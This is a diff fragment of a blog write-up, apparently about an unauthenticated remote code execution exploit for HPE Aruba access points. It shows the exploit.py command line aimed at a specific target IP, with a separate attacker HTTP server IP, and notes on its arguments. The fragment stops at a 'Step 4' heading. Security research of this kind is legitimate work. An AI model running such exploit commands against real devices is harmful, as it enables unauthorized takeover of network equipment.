zzcentury/zzcentury.github.io/blogs/HPE_Aruba_AP_Unauthorized_RCE.md

 python exploit.py --aruba_ap_ip=118.163.110.217 --action=exploit --exploit_http_server_ip=123.60.137.236
 ```

-aruba_ap_ip indicates the ip address of the target device to be exploited
+aruba_ap_ip indicates the ip address of the target device to be exploited<br>

-exploit_http_server_ip is the ip of the http server server
+exploit_http_server_ip is the ip of the http server server<br>

-action defaults to exploit
+action defaults to exploit<br>

-Wait quietly for exploit.py to finish executing, then proceed to step 4
+Wait quietly for exploit.py to finish executing, then proceed to step 4<br>

 **Step 4:** Open a new command line terminal under the exploit file and execute the following command